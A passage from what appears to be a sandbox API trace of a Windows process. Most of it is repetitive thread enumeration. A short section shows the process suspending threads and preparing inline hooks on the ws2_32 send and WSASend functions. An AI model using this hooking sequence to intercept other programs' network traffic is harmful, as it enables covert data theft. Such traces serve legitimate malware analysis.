lpte=0x22dfb70) returned 1 [0165.367] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.368] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.368] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.368] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.369] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.369] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.369] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.370] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.370] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.370] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.371] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.371] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.371] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.372] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.372] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.372] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.373] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.373] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.373] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.373] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.374] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.374] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.374] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.375] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.375] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.375] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.376] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.376] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.376] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.376] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.377] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.377] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.377] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.378] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.378] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.378] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.379] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.379] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.379] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.380] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.380] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.380] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.380] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.381] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.381] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.381] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.382] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.382] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.382] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.383] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.383] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.383] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.383] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.384] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.384] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.385] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.385] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.385] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.386] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.386] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.386] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.386] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.387] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.387] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.387] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.388] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.388] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.388] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.389] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.389] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.389] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.453] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.453] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.454] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.454] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.454] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.454] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.455] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.455] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.455] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.456] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.456] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.456] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.457] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.457] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.457] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.457] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.458] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.458] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.458] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.459] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.459] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.459] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.459] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.460] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.460] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.460] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.461] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.461] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.461] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.461] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.462] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.462] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.462] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.463] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.463] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.463] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.463] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.464] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.464] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.464] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.465] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.465] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.465] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.465] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.466] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.466] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.466] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.467] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.467] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.482] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x90) returned 0x8c [0165.482] SuspendThread (hThread=0x8c) returned 0x0 [0165.482] CloseHandle (hObject=0x8c) returned 1 [0165.483] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d8) returned 0x8c [0165.483] SuspendThread (hThread=0x8c) returned 0x0 [0165.483] CloseHandle (hObject=0x8c) returned 1 [0165.601] CloseHandle (hObject=0x88) returned 1 [0165.601] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0165.602] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0165.602] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x124224 | out: lpflOldProtect=0x124224*=0x20) returned 1 [0165.602] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x160000 [0165.602] RtlMoveMemory (in: Destination=0x160000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x160000) [0165.603] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x124224 | out: lpflOldProtect=0x124224*=0x40) returned 1 [0165.769] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0165.769] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0165.769] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x124224 | out: lpflOldProtect=0x124224*=0x20) returned 1 [0165.770] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x170000 [0165.770] RtlMoveMemory (in: Destination=0x170000, Source=0x75bc4406, Length=0x5 | out: Destination=0x170000) [0165.770] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x124224 | out: lpflOldProtect=0x124224*=0x40) returned 1 [0165.775] GetCurrentProcessId () returned 0xc4 [0165.775] GetCurrentThreadId () returned 0x950 [0165.775] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0165.777] Thread32First (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.778] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.778] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.778] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.779] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.779] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.779] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.779] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.780] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.780] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.780] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.781] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.781] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.781] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.781] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.782] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.782] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.782] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.783] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.783] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.783] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.783] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.784] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.784] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.784] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.784] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.785] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.785] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.785] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.786] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.786] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.786] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.786] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.787] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.787] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.787] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.788] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.788] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.788] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.788] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.789] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.789] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.789] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.790] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.790] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.790] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.791] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.791] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.791] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.791] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.792] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.792] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.792] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.793] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.793] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.793] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.793] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.794] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.794] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.794] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.795] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.795] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.795] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.795] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.796] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.796] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.796] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.797] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.797] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.797] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.797] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.833] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.833] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.834] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.834] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.834] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.834] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.835] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.835] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.835] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.836] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.836] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.836] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.836] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.837] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.837] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.837] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.838] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.838] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.838] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.838] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.839] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.839] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.839] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.840] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.840] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.840] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.840] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.841] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.841] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.841] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.842] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.842] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.842] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.842] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.843] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.843] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.843] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.844] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.844] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.844] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.844] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.845] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.845] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.845] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.845] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.846] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.846] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.846] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.847] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.847] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.847] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.847] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.848] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.848] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.848] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.849] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.849] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.849] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.849] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.850] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.850] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.850] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.851] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.851] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.851] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.851] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.852] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.852] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.852] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.853] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.853] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.854] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.854] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.854] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.855] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.855] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.855] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.856] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.856] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.856] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.856] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.857] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.857] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.857] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.858] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.858] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.858] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.858] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.859] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.859] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.859] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.860] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.860] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.860] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.860] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.861] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.861] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.861] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.862] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.862] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.862] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.862] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.863] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.863] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.863] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.864] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.864] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.864] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.864] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.865] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.865] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.865] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.866] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.866] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.866] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.866] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.867] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.946] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.947] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.947] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.947] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.948] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.948] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.948] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.949] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.949] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.949] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.949] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.950] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.950] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.950] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.951] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.951] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.951] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.951] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.952] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.952] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.952] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.953] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.953] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.953] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.953] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.954] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.954] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.954] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.955] Thread32Next (hSnapshot=0x88, lpte=0x22dfb70) returned 1 [0165.955] Thread32Next (hSnapshot=0x88, 